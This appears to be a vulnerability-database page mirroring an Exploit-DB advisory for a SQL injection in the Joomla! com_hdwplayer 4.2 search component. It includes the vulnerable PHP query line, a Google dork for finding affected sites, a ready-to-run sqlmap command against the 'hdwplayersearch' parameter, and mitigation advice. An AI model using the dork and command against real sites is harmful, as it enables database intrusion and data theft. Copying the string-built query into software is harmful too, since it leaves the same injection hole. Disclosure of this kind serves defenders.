header-logo
Suggest Exploit
vendor:
Joomla! com_hdwplayer
by:
qw3rTyTy
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Joomla! com_hdwplayer
Affected Version From: 4.2
Affected Version To: 4.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Debian/Nginx/Joomla! 3.9.11
2020

Joomla! com_hdwplayer 4.2 – ‘search.php’ SQL Injection

The 'search.php' file in Joomla! com_hdwplayer 4.2 is vulnerable to SQL injection. The 'hdwplayersearch' parameter is not properly sanitized before being used in an SQL query, allowing an attacker to manipulate the query and potentially execute arbitrary SQL commands.

Mitigation:

To mitigate this vulnerability, ensure that user input is properly sanitized and validated before being used in SQL queries. Additionally, consider using prepared statements or parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection
# Dork: inurl:"index.php?option=com_hdwplayer"
# Date: 2020-03-23
# Exploit Author: qw3rTyTy
# Vendor Homepage: https://www.hdwplayer.com/
# Software Link: https://www.hdwplayer.com/download/
# Version: 4.2
# Tested on: Debian/Nginx/Joomla! 3.9.11

##########################################################################
#Vulnerability details
##########################################################################
File: components/com_hdwplayer/models/search.php
Func: HdwplayerModelSearch::getsearch
Line: 33

    16	class HdwplayerModelSearch extends HdwplayerModel {
    ...snip...
    30		function getsearch() {
    31	        $db = JFactory::getDBO();	
    32			$search = JRequest::getVar('hdwplayersearch', '', 'post', 'string');		
    33		$query = "SELECT * FROM #__hdwplayer_videos WHERE published=1 AND (title LIKE '%$search%' OR category LIKE '%$search%' OR tags LIKE '%$search%')";		//!!!
    34	
    35	        $db->setQuery($query);
    36	        $output = $db->loadObjectList();		
    37	        return($output);
    38	    }
    39		
    40	}
    41	
    42	?>

##########################################################################
#PoC
##########################################################################
$> python ./sqlmap.py -u "http://127.0.0.1/joomla/index.php" --method=POST --random-agent --data "option=com_hdwplayer&view=search&hdwplayersearch=xxx" --level=5 --risk=3 --dbms=mysql -p hdwplayersearch

Navigation

Suggest Exploit

Services By CQR